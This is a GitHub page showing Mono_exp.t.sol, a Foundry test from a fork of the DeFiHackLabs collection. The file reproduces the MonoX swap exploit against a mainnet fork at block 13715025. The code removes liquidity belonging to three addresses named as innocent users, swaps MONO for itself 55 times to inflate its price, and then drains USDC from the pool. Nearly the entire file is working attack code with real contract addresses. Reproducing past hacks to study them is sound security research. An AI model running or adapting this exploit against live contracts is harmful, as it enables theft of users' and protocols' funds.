forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Mono_exp.t.sol
140 lines (116 loc) · 4.07 KB
/
Mono_exp.t.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./interface.sol";
contract ContractTest is DSTest {
WETH9 WETH = WETH9(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
USDC usdc = USDC(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
MonoToken mono = MonoToken(0x2920f7d6134f4669343e70122cA9b8f19Ef8fa5D);
Monoswap monoswap = Monoswap(0xC36a7887786389405EA8DA0B87602Ae3902B88A1);
MonoXPool monopool = MonoXPool(0x59653E37F8c491C3Be36e5DD4D503Ca32B5ab2f4);
address Monoswap_address = 0xC36a7887786389405EA8DA0B87602Ae3902B88A1;
address Mono_Token_Address = 0x2920f7d6134f4669343e70122cA9b8f19Ef8fa5D;
address WETH9_Address = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
address Innocent_user_1 = 0x7B9aa6ED8B514C86bA819B99897b69b608293fFC;
address Innocent_user_2 = 0x81D98c8fdA0410ee3e9D7586cB949cD19FA4cf38;
address Innocent_user_3 = 0xab5167e8cC36A3a91Fd2d75C6147140cd1837355;
address USDC_Address = 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48;
uint256 Amount_Of_MonoToken_On_XPool;
uint256 public Amount_Of_USDC_On_XPool;
uint256 public Amoount_Of_Mono_On_This;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("mainnet", 13715025); //fork mainnet at block 13715025
}
function testExploit() public {
mono.approve(Monoswap_address, type(uint256).max);
WETH.deposit{ value: address(this).balance, gas: 40000 }();
// WETH.balanceOf(address(this));
// VISR_Balance = visr.balanceOf(msg.sender);
emit log_named_uint("WETH Balance", WETH.balanceOf(address(this)));
WETH.approve(Monoswap_address, 0.1 ether);
monoswap.swapExactTokenForToken(
WETH9_Address,
Mono_Token_Address,
0.1 ether,
1,
address(this),
block.timestamp
);
emit log_named_uint("MonoToken Balance", mono.balanceOf(address(this)));
RemoveLiquidity_From_3_Users();
// AddLiquidity For myself
monoswap.addLiquidity(Mono_Token_Address, 196875656, address(this));
Swap_Mono_for_Mono_55_Times();
Swap_Mono_For_USDC();
emit log_named_uint(
"Exploit completed, USDC Balance",
usdc.balanceOf(msg.sender)
);
}
function RemoveLiquidity_From_3_Users() internal {
uint256 balance_Of_User1 = monopool.balanceOf(Innocent_user_1, 10);
monoswap.removeLiquidity(
Mono_Token_Address,
balance_Of_User1,
Innocent_user_1,
0,
1
);
uint256 balance_Of_User2 = monopool.balanceOf(Innocent_user_2, 10);
monoswap.removeLiquidity(
Mono_Token_Address,
balance_Of_User2,
Innocent_user_2,
0,
1
);
uint256 balance_Of_User3 = monopool.balanceOf(Innocent_user_3, 10);
monoswap.removeLiquidity(
Mono_Token_Address,
balance_Of_User3,
Innocent_user_3,
0,
1
);
}
function Swap_Mono_for_Mono_55_Times() internal {
for (uint256 i = 0; i < 55; i++) {
(, , , , , , Amount_Of_MonoToken_On_XPool, , ) = monoswap.pools(
Mono_Token_Address
);
monoswap.swapExactTokenForToken(
Mono_Token_Address,
Mono_Token_Address,
Amount_Of_MonoToken_On_XPool - 1,
0,
address(this),
block.timestamp
);
}
}
function Swap_Mono_For_USDC() internal {
(, , , , , , Amount_Of_USDC_On_XPool, , ) = monoswap.pools(USDC_Address);
Amoount_Of_Mono_On_This = mono.balanceOf(address(this));
monoswap.swapTokenForExactToken(
Mono_Token_Address,
USDC_Address,
Amoount_Of_Mono_On_This,
4000000000000,
msg.sender,
block.timestamp
);
}
receive() external payable {}
function onERC1155Received(
address _operator,
address _from,
uint256 _id,
uint256 _value,
bytes calldata _data
) external returns (bytes4) {
bytes4 a = 0xf23a6e61;
return a;
}
}